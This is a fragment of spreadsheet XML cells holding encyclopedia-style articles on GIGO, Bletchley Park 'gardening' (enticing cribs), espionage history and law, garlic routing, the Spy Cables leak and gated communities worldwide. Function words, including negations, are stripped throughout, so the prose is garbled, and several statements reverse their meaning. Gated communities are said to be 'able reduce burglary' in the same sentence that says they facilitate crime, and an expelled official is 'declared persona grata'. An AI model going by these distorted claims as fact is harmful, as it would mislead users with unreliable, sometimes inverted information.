    <t>computer science, garbage garbage (gigo) concept flawed, nonsense (garbage) input data produces nonsense output. rubbish rubbish (riro) alternate wording.the principle applies logical argumentation: sound arguments lead unsound conclusions premises flawed. history expression popular early days computing. first known 1957 syndicated newspaper article army mathematicians work early computers, army specialist named william mellin explained computers cannot think themselves, "sloppily programmed" inputs inevitably lead incorrect outputs. underlying principle noted inventor first programmable computing device design: occasions asked, "pray, babbage, machine wrong figures, right answers come out?" able rightly apprehend kind confusion ideas could provoke question. more recently, marine accident investigation branch comes similar conclusion: loading computer effective useful tool safe running ship. however, output accurate information entered term derived last-in, first-out (lifo) first-in, first-out (fifo). uses this phrase used explanation poor quality digitized audio video file. although digitizing first step cleaning signal, not, itself, improve quality. defects original analog signal faithfully recorded, might identified removed subsequent step digital signal processing. gigo also used describe failures human decision-making faulty, incomplete, imprecise data. audiology, gigo describes process occurs dorsal cochlear nucleus (dcn) auditory neuropathy spectrum disorder present. this occurs neural firing cochlea become unsynchronized, resulting static-filled sound input passed chain auditory cortex. term coined schwartz 2012 worldwide ansd conference, petersburg, florida, march 2012; adopted industry jargon describe electrical signal received dorsal cochlear nucleus passed auditory chain superior olivary complex auditory cortex destination. gigo name usenet gateway program fidonet, mausnet, e.a. also algorithmic bias computer says fino auditory neuropathy spectrum disorder standard error undefined behavior references</t>
  </si>
  <si>
    <t>Gardening (cryptanalysis)</t>
  </si>
  <si>
    <t>cryptanalysis, gardening encouraging target known plaintext encrypted message. term used british government code cypher school bletchley park, england, world schemes entice germans include particular words, british called "cribs", encrypted messages. this term presumably came minelaying missions, "gardening" sorties. "gardening" standard slang sowing mines rivers, ports oceans heights, possibly area around european coasts given code-name flowers vegetables.the technique claimed effective messages produced german navy's enigma machines. germans recently swept particular area mines, analysts bletchley park need cribs, might (and apparently several occasions) request area mined again. this would hopefully evoke encrypted messages local command mentioning minen (german mines) and/or location, perhaps messages also headquarters minesweeping ships assign location, mentioning same. worked often enough several times. this crib-based decryption example chosen-plaintext attack, plain text effectively chosen british injected ciphertext. also cryptanalysis enigma known-plaintext attack notes</t>
  </si>
  <si>
    <t>Spy</t>
  </si>
  <si>
    <t>espionage, spying intelligence gathering obtaining secret confidential information (intelligence) non-disclosed sources divulging without permission holder information tangible benefit. person commits espionage called espionage agent spy. individual ring cooperating group spies), service government, company, criminal organization, independent operation, commit espionage. practice clandestine, definition unwelcome. circumstances, legal tool enforcement others, illegal punishable law. espionage often part institutional effort government commercial concern. however, term tends associated state spying potential actual enemies military purposes. spying involving corporations known industrial espionage. effective ways gather data information targeted organization infiltrating ranks. this (espionage agent). spies return information size strength enemy forces. they also find dissidents within organization influence provide information defect. times crisis, spies steal technology sabotage enemy various ways. counterintelligence practice thwarting enemy espionage intelligence-gathering. almost nations strict laws concerning espionage penalty caught often severe. however, benefits gained espionage often great governments many large corporations make history espionage recognized importance military affairs since ancient times. oldest known classified document report made disguised diplomatic envoy court king hammurabi, died around 1750 ancient egyptians developed secret service, espionage mentioned iliad, bible, amarna letters well recordings story testament, twelve spies. espionage also prevalent greco-roman world, spies employed illiterate subjects civil services.the thesis espionage intelligence central role well peace first advanced arthashastra. middle ages european states excelled later termed counter-subversion catholic inquisitions staged annihilate heresy. inquisitions marked centrally organised mass interrogations detailed record keeping. during renaissance european states funded codebreakers obtain intelligence frequency analysis. western espionage changed fundamentally renaissance italian city-states installed resident ambassadors capital cities collect intelligence. renaissance venice became obsessed espionage council ten, nominally responsible security, even allow doge consult government archives freely. 1481 council barred venetian government officials making contact ambassadors foreigners. those revealing official secrets could face death penalty. venice became obsessed espionage successful international trade demanded city-state could protect trade secrets. under elizabeth francis walsingham appointed foreign secretary intelligence chief.during american revolution, nathan hale benedict arnold achieved fame spies, considerable spies sides american civil war. though himself, george washington america's first spymaster, utilizing espionage tactics british. 20th century, height world great powers except united states elaborate civilian espionage systems national military establishments intelligence units. order protect country foreign agents, u.s. congress passed espionage 1917. mata hari, obtained information germany seducing french officials, noted espionage agent world prior world germany imperial japan established elaborate espionage nets. 1942 office strategic services founded gen. william donovan. however, british system keystone allied intelligence. numerous resistance groups austrian maier-messner group, french resistance, witte brigade, milorg polish home army worked nazi germany provided allied secret services information important effort. since world activity espionage enlarged, much growing cold united states former ussr. russian empire successor, soviet union long tradition espionage ranging okhrana (committee state security), also acted secret police force. united states, 1947 national security created central intelligence agency (cia) coordinate intelligence national security agency research codes electronic communication. addition these, united states intelligence gathering agencies; u.s. expenditures intelligence gathering budgeted various defense dept. agencies programs. under intelligence reorganization 2004, director national intelligence responsible overseeing coordinating activities budgets u.s. intelligence agencies. cold war, espionage cases included alger hiss whittaker chambers rosenberg case. 1952 communist chinese captured agents, 1960 francis gary powers, flying reconnaissance mission soviet union cia, shot captured. during cold war, many soviet intelligence officials defected west, including gen. walter krivitsky, victor kravchenko, vladimir petrov, peter deriabin pawel monat, oleg penkovsky, (soviet military intelligence). among western officials defected soviet union burgess donald maclean great britain 1951, otto john west germany 1954, william martin bernon mitchell, u.s. cryptographers, 1960, harold (kim) philby great britain 1962. u.s. acknowledgment flights exchange francis gary powers rudolf abel 1962 implied legitimacy espionage foreign policy. china cost-effective intelligence program especially effective monitoring neighboring countries mongolia, russia, india. smaller countries also mount effective focused espionage efforts. instance, vietnamese communists consistently superior intelligence vietnam war. some islamic countries, including libya, iran, syria, highly developed operations well. savak, secret police pahlavi dynasty, particularly feared iranian dissidents 1979 iranian revolution. today today, agencies target illegal drug trade terrorists well state actors. between 2008 2011, united states charged least defendants attempting china.intelligence services value certain intelligence collection techniques others. former soviet union, example, preferred human sources research open sources, united states tended emphasize technological methods sigint imint. soviet union, political (kgb) military intelligence (gru) officers judged number agents recruited. espionage efforts knowledge nation often used countries hiring intelligence employees. united arab emirates major countries relying technique, hired former employees national security agency white house veterans. some agents hired hack emirates' former rival nation qatar, royals even fifa officials. others asked conduct surveillance governments, human rights activists, social media critics, even militants. however, spying efforts using americans also used target itself, including former first lady michelle obama.in september 2021, three former intelligence officials america admitted working united arab emirates' darkmatter hacking computers, servers, electronic devices, including computers servers united states. according court documents, three operatives—daniel gericke, ryan adams, marc baier—helped emirati intelligence operatives advanced cyber technology assist breaches directed potential enemies political rivals. darkmatter also hired several ex-n.s.a. c.i.a. officers salaries worth hundreds thousands dollars year.in august 2022, 44-year-old former twitter employee, ahmad abouammo found guilty spying government saudi arabia. prosecutors said accessing email accounts phone numbers accounts writing negatively saudi regime. time worked firm, 2013 2015, abouammo passing private user information saudi official associated government. exchange, received luxury watch hundreds thousands dollars. almost year, abouammo took bribes around three times annual salary, citing prosecutor said, “that kind money nothing.” other charges included money laundering, falsification records count wire fraud. targets espionage espionage agents usually trained experts targeted field differentiate mundane information targets value organizational development. correct identification target execution sole purpose espionage operation.broad areas espionage targeting expertise include: natural resources: strategic production identification assessment (food, energy, materials). agents usually found among bureaucrats administer resources countries popular sentiment towards domestic foreign policies (popular, middle class, elites). agents often recruited field journalistic crews, exchange postgraduate students sociology researchers strategic economic strengths (production, research, manufacture, infrastructure). agents recruited science technology academia, commercial enterprises, rarely among military technologists military capability intelligence (offensive, defensive, manoeuvre, naval, air, space). agents trained military espionage education facilities posted area operation covert identities minimize prosecution counterintelligence operations targeting opponents' intelligence services themselves, breaching confidentiality communications, recruiting defectors moles methods terminology although news media speak "spy satellites" like, espionage synonym intelligence-gathering disciplines. specific form human source intelligence (humint). codebreaking (cryptanalysis comint), aircraft satellite photography (imint), analysis publicly available data sources (osint) intelligence gathering disciplines, none considered espionage. many humint activities, prisoner interrogation, reports military reconnaissance patrols diplomats, etc., considered espionage. espionage disclosure sensitive information (classified) people cleared information access sensitive information. unlike forms intelligence collection disciplines, espionage usually involves accessing place desired information stored accessing people know information divulge kind subterfuge. there exceptions physical meetings, oslo report, insistence robert hanssen never meeting people bought information. defines espionage towards "the obtaining, delivering, transmitting, communicating, receiving information national defence intent, reason believe, information used injury united states advantage foreign nation". black's dictionary (1990) defines espionage "... gathering, transmitting, losing information related national defense". espionage violation united states law, u.s.c. 792–798 article 106a uniform code military justice. united states, like nations, conducts espionage nations, control national clandestine service. britain's espionage activities controlled secret intelligence service. technology techniques source: organization person employed seek secret information source. within united states intelligence community, "asset" common usage. case officer special agent, diplomatic status (i.e., official cover non-official cover), supports directs human collector. cut-outs couriers know agent case officer transfer messages. safe house refuge spies. spies often seek obtain secret information another source. larger networks, organization complex many methods avoid detection, including clandestine cell systems. often players never met. case officers stationed foreign countries recruit supervise intelligence agents, turn targets countries assigned. need citizen target country hence automatically commit treason operating within while common practice recruit person already trusted access sensitive information, sometimes person well-prepared synthetic identity (cover background), called legend tradecraft, attempt infiltrate target organization. these agents moles (who recruited access secrets), defectors (who recruited access secrets leave country) defectors place (who access leave). legend also employed individual illegal agent, ordinary citizen "relocated", example, "protected witness". nevertheless, non-agent likely also case officer controller. most, synthetic identity schemes, whatever purpose (illegal legal), assistance controller required. spies also used spread disinformation organization planted, giving false reports country's military movements, competing company's ability bring product market. spies given roles also require infiltration, sabotage. many governments allies well enemies, although typically maintain policy commenting this. governments also employ private companies collect information behalf international risk, international intelligence limited others. many organizations, national non-national, conduct espionage operations. assumed espionage always directed secret operations target country. national terrorist organizations groups also targeted. this governments want retrieve information proactive protecting nation potential terrorist attacks. communications necessary espionage clandestine operations, also great vulnerability adversary sophisticated sigint detection interception capability. spies rely covcom covert communication technically advanced devices. agents must also transfer money securely. industrial espionage reportedly canada losing billion german companies estimated losing billion ($87 billion) 30,000 jobs industrial espionage every year. agents espionage espionage jargon, "agent" person spying. they citizen country recruited country another; citizen country recruited country carry false flag assignments disrupting country; citizen country recruited second country work country third country, more. popular usage, term sometimes confused intelligence officer, intelligence operative case officer recruits handles agents. among common forms agent are: agent provocateur: instigates trouble provides information gather many people possible location arrest. intelligence agent: provides access sensitive information special privileges. used corporate intelligence gathering, include gathering information corporate business venture stock portfolio. economic intelligence, "economic analysts specialized skills analyze interpret economic trends developments, assess track foreign financial activities, develop econometric modelling methodologies." this also include information trade tariff. agent-of-influence: provides political influence area interest, possibly including publications needed intelligence service agenda. media print story mislead foreign service action, exposing operations surveillance. double agent: engages clandestine activity intelligence security services joint operations), provides information other, wittingly withholds significant information instructions unwittingly manipulated significant facts withheld adversary. peddlers, fabricators others work rather service double agents agents. fact double agents agent relationship sides distinguishes penetrations, normally placed target service staff officer capacity."redoubled agent: forced mislead foreign intelligence service caught double agent. unwitting double agent: offers forced recruit double redoubled agent process recruited either third-party intelligence service government without knowledge intended target intelligence service agent. this useful capturing important information agent attempting seek allegiance another country. double agent usually knowledge intelligence services identify operational techniques both, thus making third-party recruitment difficult impossible. knowledge operational techniques also affect relationship operations officer case officer) agent case transferred operational targeting officer operations officer, leaving officer vulnerable attack. this type transfer occur officer completed term service cover blown. sleeper agent: recruited wake perform specific tasks functions living undercover area interest. this type agent deep cover operative, continually contacts case officer file intelligence reports. sleeper agent contact anyone activated. triple agent: works three intelligence services.less common lesser known forms agent include: access agent: provides access potential agents providing offender profiling information help lead recruitment intelligence service. confusion agent: provides misleading information enemy intelligence service attempts discredit operations target operation. facilities agent: provides access buildings, garages offices used staging operations, resupply, etc. illegal agent: lives another country false credentials report local station. nonofficial cover operative dubbed "illegal" working another country without diplomatic protection. principal agent: functions handler established network agents, usually considered "blue chip". espionage nation crime legal code many nations. united states, covered espionage 1917. risks espionage vary. violating host country's laws deported, imprisoned, even executed. violating country's laws imprisoned espionage or/and treason (which united states jurisdictions occur take arms aids enemy country wartime), even executed, rosenbergs were. example, aldrich ames handed stack dossiers u.s. central intelligence agency (cia) agents eastern bloc kgb-officer "handler", "rolled several networks, least people secretly shot. when ames arrested u.s. federal bureau investigation (fbi), faced life prison; contact, diplomatic immunity, declared persona grata taken airport. ames' wife threatened life imprisonment husband cooperate; did, given five-year sentence. hugh francis redmond, officer china, spent nineteen years chinese prison espionage—and died there—as operating without diplomatic cover immunity.in united states law, treason, espionage, spying separate crimes. treason espionage graduated punishment levels. united states world passed espionage 1917. over years, many spies, soble ring, robert johnson, rosenberg ring, aldrich hazen ames, robert philip hanssen, jonathan pollard, john anthony walker, james hall iii, others prosecuted law. history espionage laws from ancient times, penalty espionage many countries execution. this true right world example, josef jakobs nazi parachuted great britain 1941 executed espionage. modern times, many people convicted espionage given penal sentences rather execution. example, aldrich hazen ames american analyst, turned mole, convicted espionage 1994; serving life sentence without possibility parole high-security allenwood u.s. penitentiary. ames formerly 31-year counterintelligence officer analyst committed espionage country spying soviet union russia. known, ames compromised second-largest number agents, second robert hanssen, also serving prison sentence. non-spies espionage laws also used prosecute non-spies. united states, espionage 1917 used socialist politician eugene debs time much stricter guidelines amongst things banned speech military recruiting). later used suppress publication periodicals, example father coughlin world early 21st century, used prosecute whistleblowers thomas andrews drake, john kiriakou, edward snowden, well officials communicated journalists innocuous reasons, stephen jin-woo kim.as 2012, india pakistan holding several hundred prisoners other's country minor violations like trespass visa overstay, often accusations espionage attached. some include cases pakistan india deny citizenship people, leaving stateless. reported 2012 case, mohammed idrees, held indian police control approximately years overstaying 15-day visa days seeing parents 1999. much years spent prison waiting hearing, time spent homeless living generous families. indian people's union civil liberties human rights network decried treatment. attributed problems tensions caused kashmir conflict. espionage laws espionage illegal official secrets acts 1911 1920. legislation considers espionage "concerning intend help enemy deliberately harm security nation". according mi5, person commits offence 'spying' they, "for purpose prejudicial safety interests state": approaches, enters inspects prohibited area; makes documents plans intended, calculated, could directly indirectly enemy; "obtains, collects, records, publishes, communicates person secret official code word, password, sketch, plan, model, article, note, document calculated might intended directly indirectly useful enemy". illegality espionage also includes action considered 'preparatory spying, encouraging aiding another spy.under penal codes found guilty espionage liable imprisonment term years, although multiple sentences issued. government intelligence laws distinction espionage government intelligence much distinct espionage, illegal providing organisations individuals registered, often ico, acting within restrictions regulation investigatory powers (ripa). 'intelligence' considered legally "information sorts gathered government organisation guide decisions. includes information public private, obtained much different public secret sources. could consist entirely information either publicly available secret sources, combination two."however, espionage intelligence linked. according website, "foreign intelligence officers acting diplomatic cover enjoy immunity prosecution. such persons tried spying (or, indeed, criminal offence) diplomatic immunity waived beforehand. those officers operating without diplomatic cover immunity prosecution". there also laws surrounding government organisational intelligence surveillance. generally, body involved issued form warrant permission government enacting procedures interest protecting national security safety public citizens. those carrying intelligence missions within ripa also data protection human rights act. however, equipment laws legal requirements around intelligence methods vary form intelligence enacted. war, espionage considered permissible many nations recognize inevitability opposing sides seeking intelligence dispositions other. make mission easier successful, combatants wear disguises conceal true identity enemy penetrating enemy lines intelligence gathering. however, caught behind enemy lines disguises, entitled prisoner-of-war status subject prosecution punishment—including execution. hague convention 1907 addresses status wartime spies, specifically within "laws customs land" (hague iv); october 1907: chapter spies". article states person considered who, acts clandestinely false pretences, infiltrates enemy lines intention acquiring intelligence enemy communicate belligerent times war. soldiers penetrate enemy lines proper uniforms purpose acquiring intelligence considered spies lawful combatants entitled treated prisoners upon capture enemy. article states captured behind enemy lines punished following trial. however, article provides successfully rejoined military captured enemy lawful combatant, cannot punished previous acts espionage must treated prisoner war. note provision apply citizens committed treason country co-belligerents country captured prosecuted place time regardless whether rejoined military belongs war.the ones excluded treated spies behind enemy lines escaping prisoners downed airmen international distinguishes disguised disguised escaper. permissible groups wear enemy uniforms civilian clothes order facilitate escape back friendly lines long attack enemy forces, collect military intelligence, engage similar military operations disguised. soldiers wearing enemy uniforms civilian clothes simply sake warmth along purposes rather engaging espionage similar military operations attired also excluded treated unlawful combatants.saboteurs treated spies wear disguises behind enemy lines purpose waging destruction enemy's vital targets addition intelligence gathering. example, world eight german agents entered u.s. june 1942 part operation pastorius, sabotage mission u.s. economic targets. weeks later, arrested civilian clothes thanks german agents betraying mission u.s. under hague convention 1907, germans classified spies tried military tribunal washington d.c. august 1942, eight found guilty sentenced death. five days later, executed electric chair district columbia jail. given evidence others sentences reduced president franklin roosevelt prison terms. 1948, released president harry truman deported american zone occupied germany. u.s. codification enemy spies article uniform code military justice. this provides mandatory death sentence person captured proven "lurking acting place, vessel, aircraft, within control jurisdiction armed forces, shipyard, manufacturing industrial plant, place institution engaged work prosecution united states, elsewhere". fiction spies long favorite topics novelists filmmakers. early example espionage literature english novelist rudyard kipling, description training intelligence agent great game russia 19th century central asia. even earlier work james fenimore cooper's classic novel, spy, written 1821, american york revolutionary war. during many 20th-century scandals, much information became publicly known national agencies dozens real-life secret agents. these sensational stories piqued public interest profession largely off-limits human interest news reporting, natural consequence secrecy inherent work. fill blanks, popular conception secret agent formed largely 20th 21st-century fiction film. attractive sociable real-life agents valerie plame find little employment serious fiction, however. fictional secret agent often loner, sometimes amoral—an existential hero operating outside everyday constraints society. loner personalities stereotype convenience authors already knew write loner private investigator characters sold well 1920s present.johnny fedora achieved popularity fictional agent early cold espionage, james bond commercially successful many characters created intelligence insiders struggle. other fictional agents include carré's george smiley, harry palmer played michael caine. jumping bandwagon, writers also started writing fiction featuring female spies protagonists, baroness, graphic action sex, compared novels featuring male protagonists. fiction permeated video game world well, games perfect dark, goldeneye 007, lives forever, metal gear series. espionage also made comedy depictions. 1960s series smart, 1983 finnish film agent deadly curves, johnny english film trilogy portrays inept spy, 1985 movie spies like depicts pair none-too-bright sent soviet union investigate missile. historical novel emperor highlights adventurous life u.s. colonel sidney forrester mashbir, 1920s 1930s attempted prevent japan, erupt, became general macarthur's advisor pacific theater world two.black widow also fictional agent introduced russian spy, antagonist superhero iron man. later became agent fictional agency s.h.i.e.l.d. member superhero team avengers. also references citations works cited johnson, john (1997). evolution british sigint, 1653–1939. london: hmso. oclc 52130886. winkler, jonathan reed (july 2009). "information warfare world journal military history. (3): 845–867. doi:10.1353/jmh.0.0324. issn 1543-7795. s2cid 201749182. further reading external links history espionage russia</t>
  </si>
  <si>
    <t>Garlic routing</t>
  </si>
  <si>
    <t>garlic routing variant onion routing encrypts multiple messages together make difficult attackers perform traffic analysis increase speed data transfer.michael freedman defined "garlic routing" extension onion routing, multiple messages bundled together. called message "bulb", whereas calls "garlic cloves". messages, delivery instructions, exposed endpoint. this allows efficient bundling onion routing "reply block" original message.garlic routing factors distinguishes privacy encryption networks. name alludes garlic plant, whose structure protocol resembles. "garlic routing" first coined michael freedman roger dingledine's free haven master's thesis section 8.1.1 (june 2000), derived onion routing. however, garlic routing implementation differs design proposed freedman. difference garlic routing unidirectional tunnels, whereas mainstream alternatives like mixmaster bidirectional tunnels. garlic cast: lightweight decentralized content sharing potential implementation garlic routing protocol shown paper, garlic cast: lightweight decentralized anonymous content sharing. idea provide resilient latency anonymous content sharing network based garlic routing. distinguishing benefit makes system different traditional networks designed around secure, fast communication. this made possible allowing garlic cast system random walks find proxies overlay network security-enhanced information dispersal algorithm deliver content secure fast manner. lastly, garlic cast network designed highly resistant wide range attacks still providing high level anonymity. list applications garlic routing i2p, anonymizing overlay network allows applications (open source, written java) perfect dark, client relies mixnet distributed datastore provide anonymity (freeware, written windows) also anonymous remailer key-based routing network mixmaster anonymous remailer public-key cryptography references</t>
  </si>
  <si>
    <t>Spy Cables</t>
  </si>
  <si>
    <t>cables series leaked documents global intelligence agencies published jazeera guardian 2015. documents date 2006 december 2014 largely derived communications south africa's state security agency various agencies. agencies included leaks include israel's mossad, russia's fsb, agencies france, jordan, oman, united arab emirates, united kingdom's secret intelligence service, united states, countries africa.in reports based document cache, jazeera exposed foreign spies operating south africa gained access government departments including president's office, nuclear facilities, military secrets. report said citizens, civil servants diplomats helping spies unwittingly providing classified information allowing access restricted areas." specific revelations israeli intelligence agency mossad contradicted prime minister israel, benjamin netanyahu's assertion iran year away making nuclear weapon. report written mossad said iran "not performing activity necessary produce weapons". united states's central intelligence agency tried contact hamas even though banned leader environmental group greenpeace targeted south korean intelligence agencies. president united states, barack obama "threatened" palestinian president withdraw palestine's attempt recognition united nations. south african intelligence spied russia controversial $100m joint satellite deal. south african ethiopian agencies accused sudan 2012 plot kill african union commission's chairperson nkosazana dlamini-zuma addis ababa. documents also showed dlamini-zuma's election 2012 head commission involved tense diplomatic politicking included lobbying south africa also united states france. south africa accused israel using airlines cover intelligence agencies. june 2012, group claiming former mossad agents threatened south africa cyber attack country's banking financial sectors, government intervene boycott, divestment sanctions campaign. july 2012 mossad requested detailed information mohamed morsi, elected president egypt. also united states diplomatic cables leak references</t>
  </si>
  <si>
    <t>Gated community</t>
  </si>
  <si>
    <t>modern form, gated community walled community) form residential community housing estate containing strictly controlled entrances pedestrians, bicycles, automobiles, often characterized closed perimeter walls fences. similar walls gates separated quarters cities centuries. gated communities usually consist small residential streets include various shared amenities. smaller communities, amenities include park common area. larger communities, possible residents stay within community daily activities. gated communities type common interest development, distinct intentional communities. given gated communities spatially type enclave, setha low, anthropologist, argued negative effect social capital broader community outside gated community. some gated communities, usually called guard-gated communities, staffed private security guards often home high-value properties, and/or retirement villages. some gated communities secure enough resemble fortresses intended such. features besides services gatekeepers, many gated communities provide amenities. these depend number factors including geographical location, demographic composition, community structure, community fees collected. when sub-associations belong master associations, master association provide many amenities. general, larger association amenities provided. amenities also depend type housing. example, single-family-home communities common-area swimming pool, since individual home-owners ability construct private pools. condominium, hand, offer community pool, since individual units option private pool installation. typical amenities offered include more: swimming pools bowling alleys tennis courts community centres clubhouses golf courses marina on-site dining playgrounds exercise rooms including workout machines coworking spaces around world brazil, widespread form gated community called "condomínio fechado" (closed housing estate) object desire upper classes. such place small town infrastructure (reserve power supply, sanitation, security guards). purpose community protect residents exterior violence. philosophy seen closed buildings shopping centres (many accessed inside parking garage). pakistan, gated communities located well small cities considered standard high quality living. defence housing authority bahria town major private gated community developers administrators largest world. assets bahria town worth billion. most gated communities pakistan public parks, schools, hospitals, shopping malls, gymnasiums, country clubs.in argentina, called "barrios privados" (literal translation "private neighbourhoods") "countries" often seen symbol wealth. however, gated communities enjoy dubious social prestige (many members middle upper middle class regard gated community dwellers nouveaux riches snobs). while gated communities houses, bigger ones, nordelta, hospital, school, shopping mall, more. post-apartheid south africa, gated communities mushroomed response high levels violent crime. they commonly referred "complexes" also broadly classified "security villages" (large-scale privately developed areas) "enclosed neighbourhoods". some newest neighbourhoods developed almost entirely composed security villages, malls essential services (such hospitals). part, property developers adopted response counter squatting, local residents fear associated crime, often results protracted eviction process. they popular southern china hong kong, apartment compounds 24/7 guards duty, high-end residences, facial recognition systems grant residents domestic workers entry compound. famous clifford estates guangzhou. saudi arabia, gated communities existed since discovery oil, mainly accommodate families europe north america. after threat levels increased late 1990s foreigners general u.s. citizens particular, gates became armed, sometimes heavily, vehicles inspected. marksmen saudi arabian national guard armored vehicles appeared certain times, markedly recent terrorist attacks areas near-by, targeting people european north american countries. gated communities rare continental europe japan. criticism proponents gated communities (and lesser degree, cul-de-sacs) maintain reduction exclusion people would passing through, generally, non-local people, makes "stranger" much recognisable closed local environment, thus reduces crime danger. however, since small proportion non-local people passing area potential criminals, increased traffic increase rather decrease safety people around whose presence could deter criminal behaviour could provide assistance incident.another criticism gated communities offer false sense security. some studies indicate safety gated communities illusion reality gated communities suburban areas united states less crime similar non-gated neighbourhoods.a commentary york times specifically blames gated communities shooting death trayvon martin columnist states "gated communities churn vicious cycle attracting like-minded residents seek shelter outsiders whose physical seclusion worsens paranoid groupthink outsiders."in influential paper, vanessa watson includes gated communities within class "african urban fantasies": attempts remake african cities vein dubai singapore. watson's analysis, kind urban planning prizes exclusionary self-contained spaces limit opportunities interaction different classes, worsening marginalization urban poor.a study done breetzke, landman cohn (2014) investigated effect gated communities individual's risk burglary victimization south africa. results shown gated communities able reduce burglary, even facilitate criminal activities. gated communities areas surrounding them, densities burglary found four times higher tshwane. crime rates decrease areas away gated communities. also, high risk burglaries found consistent daytime night-time. research effect gated communities south africa reflects negative correlation gated communities crime prevention, effectiveness gated communities doubt. common economic model types life-style country clubs, retirement developments. prestige gates status appeal physical security communities gates crime traffic. purpose-designed communities catering foreigners (e.g. worker compounds mid-west asia, built largely industry) comparison closed cities closed cities russia different gated communities. guard duty closed cities free residents (paid taxes). public transport closed cities transit checkpoints checking passes/passports technical stops available others outside security area. within gated community best cases, stop opposite checkpoint; offer free buses. gated communities buses easement good will. fares communal payment closed cities often equal cases greater) would common city. gated communities service companies raise legally fixed tariffs difficult communities either negotiate lower terms knock service company cases result quorum). countries limited number gated communities long established foreigners various countries world: worker compounds middle east, built largely industry. arbor oaks subdivision located monte, california, appears film back future part "hilldale", gated fans coming person. residents sometimes angry fans come development. argentina there many gated communities argentina, especially greater buenos aires, suburb pilar, buenos aires city, suburban areas, nordelta. tortugas country club first gated community developed argentina, dating 1930s/1940s, date 1990s, liberal reforms consolidated. since buenos aires traditionally regarded socially integrated city, gated communities subject research sociologists. gated communities important middle upper-class people cope high levels violent criminal activity greater buenos aires. australia although gated communities rare australia, since 1980s, built. well-known hope island, particular sanctuary cove, gold coast queensland. other similar projects built area. victoria, first development sanctuary lakes, local government area wyndham, south west melbourne. south wales, macquarie links gated community well southgate estate gated community. many australian gated communities built within private golf courses. act, example uriarra village, based around community horse paddocks dwellings jointly managed strata title. brazil brazil also many gated communities, particularly metropolitan regions janeiro paulo. example, paulo's suburbs, tamboré, least compounds known tamboré each consists generously spaced detached houses little separate front gardens. first big-scale gated community projects paulo city region barueri's alphaville, planned constructed 1970s military dictatorship cities brazil faced steep increases ownership middle higher-classes, rural exodus, poverty, crime, urban sprawl, downtown decay. canada neighbourhoods "physical" explicit gating security checkpoints patrols extremely rare, absent even canada's richest neighbourhoods bridle path, toronto. furthermore, municipal planning laws many canadian provinces locked gates public roads health issue since deny emergency vehicles quick access. noted exception canada arbutus ridge, age-restricted community constructed 1988 1992 southeastern coast vancouver island. more common canadian neighbourhoods, especially largest cities, implicit symbolic gating effectively partitions private infrastructure amenities communities surrounding neighbourhoods. classic example affluent montreal suburb mount royal, long fence running along side l'acadie boulevard intents purposes separates community working-class neighbourhood park extension. also, many newer suburban subdivisions employ decorative gates give impression exclusivity seclusion. china china, compounds, like gated communities around world, target rich. also many foreigners live gated communities beijing. often foreign companies choose locations foreign employees live, cases, rent associated costs (e.g. management fees garden work). similar communities exist shanghai, another major chinese city. shanghai links, exclusive expatriate community enclosing golf course pudong campus shanghai american school, example. shanghai links project began 1994 signing prime minister canada, honourable jean chretien, memorandum agreement shanghai pudong area government controlled company, huaxia tourism development company. other notable gated communities shanghai include seasons villas, development hutchinson whampoa; thomson golf villas, green villas. other gated communities china daxing district beijing enclose homes rural migrants. these intended reduce crime increase public order safety, chinese communist party-run people's daily claims has, 73%. system controversial segregates migrants poor, claiming true purpose keep track migrants, scheduled implementation changping district also. ecuador guayaquil quito, ecuador many gated communities. coastal city guayaquil, mostly located samborondón quito valleys surrounding city. they home mostly wealthiest people, trend, especially guayaquil, houses gated communities moderate prices well. egypt population boom increasing class segregation, gated communities established egypt since 1970s. greater cairo, example, home rehab dreamland, mountain view egypt. there also maamoura alexandria. they criticized niche market fails address crippling congestion problem cairo. india india, many gated neighbourhoods cities upper middle-class upper-class people live. delhi, mumbai, chennai, bangalore, noida like gated communities. sometimes communities separated wealth also ethnicity. there colonies delhi based profession also like press enclave, journalists 1970s. members particular ethnicity tend feel comfortable living among owing reasons related common festivals, language, cuisine. examples common delhi strong punjabi community. many gated neighbourhoods predominantly punjabi cases discrimination members ethnic backgrounds living villas. neighbouring countries, target housing societies seem upper-middle upper class citizens. caste religious discrimination prevalent real estate industry. nonetheless, non-residential indians (foreigners indian origin) interested gated housing. indonesia indonesia, gated communities luxurious (with square metres (8000 ft)), affordable (with lots ranging square metres). from 2000, residential areas built private developers mostly composed gated communities. examples include residential areas bumi serpong damai south tangerang, tropicana residence community tangerang city, telaga golf sawangan pesona khayangan depok, sentul city bogor regency. gated communities indonesia still allow outsiders facilities inside community regulation social facilities residential development handed local government used public. italy examples gated community italy olgiata rome village roccamare, castiglione della pescaia, tuscany. lebanon because pollution, lack proper infrastructure, electrical power green spaces residential areas outside beirut, high class society chooses reside gated communities better living environment. gated communities lebanon mainly suburbs capital city beirut. malaysia malaysia, known gated guarded communities seeing steady increase popularity. currently, according town country planning department, four types gated communities malaysia, namely: elite community: type gated community primarily occupied upper-class high-income group people. focuses exclusion status security major concerns resident's status within community. lifestyle community: lifestyle community generally consists retirement communities, leisure communities suburban 'new towns'. activities inside communities include golf courses, horseback riding residents-oriented leisure activities. security zone community: security zone community popular type gated community offers housing development surrounded fences gates. this development normally provided guard services. security zone community lifestyle: type gated community housing development usually developed within city centre. focuses security aspect provision lifestyle facilities residents.the gated community concept emerged response rise safety security issues, offers advantages terms calm environment enhanced safety ideal family development. mauritius several gated communities exist island mauritius since government introduced integrated resort schemes (irs) real estate schemes (res) 1990s. recently amalgamated property development schemes (pds). government also introduced smart city permits 2016 secured assistance saudi arabia launch government's version gated smart city known heritage city project proposed minissy, region ebène, assistance saudi arabia. mexico gated communities mexico result huge income existing country. 2008 study found average income urban area mexico $26,654, rate higher advanced regions like spain greece average income rural areas (sometimes short distance away) $8,403. this close proximity wealth poverty created large security risk mexico's middle class. gated communities found virtually every medium large-sized city mexico largest found major cities, monterrey, mexico city guadalajara. luxury "status" gated communities popular middle high income residents mexico. gated luxury communities mexico considerably cheaper countries united states retaining houses similar size quality commonness communities lower cost build priced lower attract middle class residents. many gated communities mexico fully independent self-contained infrastructure, schools, water power facilities, security fire forces, medical facilities. some larger gated communities even retain school districts police departments. interlomas area mexico city contains hundreds gated communities largest concentration gated communities world, stretching square kilometres mi). surrounding areas santa bosques-lomas, interlomas-bosque real, also made predominantly gated communities span greater mexico city. many smaller gated communities mexico officially classified separate gated communities many municipal rules prohibit closed roads. most small neighbourhoods cater lower middle income residents offer close perimeter check points similar "authentic" gated community. this situation tolerated sometimes even promoted city governments lack capacity provide reliable trusted security forces. zealand zealand, gated communities developed suburban areas main cities since 1980s 1990s. pakistan pakistan large number gated communities, target middle class 